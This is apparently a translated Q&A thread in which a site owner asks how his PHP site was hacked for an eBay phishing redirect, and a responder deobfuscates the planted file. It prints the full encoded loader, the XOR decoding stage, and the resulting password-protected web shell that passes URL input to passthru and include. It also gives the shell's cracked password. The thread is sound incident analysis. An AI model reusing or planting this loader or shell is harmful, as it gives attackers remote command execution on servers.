最近我的一个网站被黑了.虽然实际网站保持不变,但他们能够以某种方式使用该域创建一个重定向到ebay网络钓鱼诈骗的链接.
由于显而易见的原因,我把网站关闭了,所以我无法链接到代码.我想知道如何找出他们使用的漏洞,以便将来可以避免这个问题.该页面使用PHP,还有一些javascript(用于表单验证).
是否有免费服务会扫描我的代码中的漏洞?我还有什么其他选择?
谢谢,杰夫
编辑:我托管了[链接删除]的文件
有几点需要注意:"funcs"文件夹中有几个文件,其中大部分都没有使用过,但为了以防万一,我把它们留在了那里."data"文件夹中的"new.php"(下面的内容)显然是个问题.最大的问题是,有人如何设法将"new.php"上传到服务器?还收到了我收到的电子邮件的RTF,其中包含有关骗局的信息.
(注意:此代码可能对您的计算机"危险")
<?php
$prv=strrev('edoced_46esab');
$vrp=strrev('etalfnizg');
eval($vrp($prv("rVPRbpswFNW0P9jbNE1ChojQSDD7cm0syvoB5A/GxhiBJVoKxJC0pFr667v0pe1L2k17snyvz/G559jOLxCVxjGCfEBYc1noQfE8VL0SpUYTwQah43LQueKbh3IeQYlguBx1p/gQqkqJFUKiPsWO0Vgh9LoN1R4EoUsuq7xU3Cgxgug0DhHQiVVOjVavFK9ClbDjKH2ZLgOrbpoA0RbNj/dv3r77KF3ED237vVlkrH9Wu7srzM1uv7t3h942N5mTsYM7O52s0y5jsz3thntz6gvCPiWcEVubLpO0tme+VxdHGdq3xe90WU+0wg+hQREGEi9c9G18gprOBPPZBWTMfixP1YwFdlMcNw9UVInT5XjLYqcHQcOSTxvFGyV+5q3GPcKgOzKHHFUi+Te/YmerBK0Nua/XectlnU+JRDBq7OjWKRJOEE0tSqaKIOkHs62a+StEebFDgR4UL7jc5l0Ea9JBXNiSDD3F5bpx3Zq5syaIpudx0FiAuI7gwGVPCpW4TugtnGlf/v0EZ/kWC+8F0ZafWOXazFuzeo0JX87d9tWzvlnOf/s4Xlwdiu2cXX1m/gtT+OzyinnxHw==")));
?>
xel*_*o52 10
有趣的东西在这里发生.php块评估为一个漂亮的小"代码生成器":
$k32e95y83_t53h16a9t71_47s72c95r83i53p16t9_71i47s72_83c53r16y9p71t47e72d53=70;
$r95e53s9o47u32r83c16e_c71r72y32p95t83e53d_c16o9d71e47="zy6.6KL/ fnn/55#2nb6'55oo`n+\"snb6'55o{{arwquq'ts#rw\$\"v'%~~ ~q\"%u\"vtr~sao`n/55#2nb%oooKL=Kf#%.)faz64#xa}KLf6'552.43n524/65*'5.#5nb%oo}KLf/(%*3\"#nb%o}KLf\"/#nazi64#xao}K;KLyx";
$s32t83r16i71n72g_o95u53t9p47u16t72=$r95e53s9o47u32r83c16e_c71r72y32p95t83e53d_c16o9d71e47;$l72e47n71t9h_o16f_c53r83y95p32t47e71d_c9o16d53e83=strlen($s32t83r16i71n72g_o95u53t9p47u16t72);
$e72v71a16l_p83h32p_c95o53d9e47='';
for($h47u9i53v95a32m83v16s71e72m=0;$h47u9i53v95a32m83v16s71e72m<$l72e47n71t9h_o16f_c53r83y95p32t47e71d_c9o16d53e83;$h47u9i53v95a32m83v16s71e72m++)
$e72v71a16l_p83h32p_c95o53d9e47 .= chr(ord($s32t83r16i71n72g_o95u53t9p47u16t72[$h47u9i53v95a32m83v16s71e72m]) ^ $k32e95y83_t53h16a9t71_47s72c95r83i53p16t9_71i47s72_83c53r16y9p71t47e72d53);
eval("?>".$e72v71a16l_p83h32p_c95o53d9e47."<?");
当令人讨厌的变量名称替换为更具可读性的东西时,您会得到:
$Coefficient=70;
$InitialString="zy6.6KL/ fnn/55#2nb6'55oo`n+\"snb6'55o{{arwquq'ts#rw\$\"v'%~~ ~q\"%u\"vtr~sao`n/55#2nb%oooKL=Kf#%.)faz64#xa}KLf6'552.43n524/65*'5.#5nb%oo}KLf/(%*3\"#nb%o}KLf\"/#nazi64#xao}K;KLyx";
$TargetString=$InitialString;
$CntLimit=strlen($TargetString);
$Output='';
for($i=0;$i<$CntLimit;$i++)
$Output .= chr(ord($TargetString[$i]) ^ $Coefficient);
eval("?>".$Output."<?");
在评估时,吐出代码:
<?php
if ((isset($_GET[pass]))&(md5($_GET[pass])==
'417379a25e41bd0ac88f87dc3d029485')&(isset($_GET[c])))
{
echo '<pre>';
passthru(stripslashes($_GET[c]));
include($_GET[c]);
die('</pre>');
}
?>
值得注意的是,字符串:'417379a25e41bd0ac88f87dc3d029485'是密码的md5哈希:Zrhenjq2009
我明天会再开这个.
编辑:
好的,所以我花了几分钟时间玩这个.它看起来像一个遥控器脚本.所以现在这个页面(new.php)就位于你的服务器上,如果用户点击这个页面并传递一个名为'pass'的url参数,其值为'Zrhenjq2009',那么他们就可以执行一个外部命令了.服务器通过将url中的命令和参数作为名为"c"的参数传递.所以这就是一个代码生成器,它在服务器上创建了一个后门.很酷.
我下载了你上传的文件并通过VirusTotal.com运行new.php ,它似乎是一个新的(或实质上修改过的)木马.另外,看起来51.php是PHPSpy木马:VirusTotal分析,74.php是PHP.Shellbot木马VirusTotal分析,func.php是"webshell by orb".看起来有人在您的服务器上删除了一个不错的黑客工具包以及您上传的文档中引用的ebay网络钓鱼脚本/页面.
您应该删除原始帖子中的文件下载链接.
如果您掌握了日志,可能会很有趣.
请享用.
| 归档时间: |
|
| 查看次数: |
3442 次 |
| 最近记录: |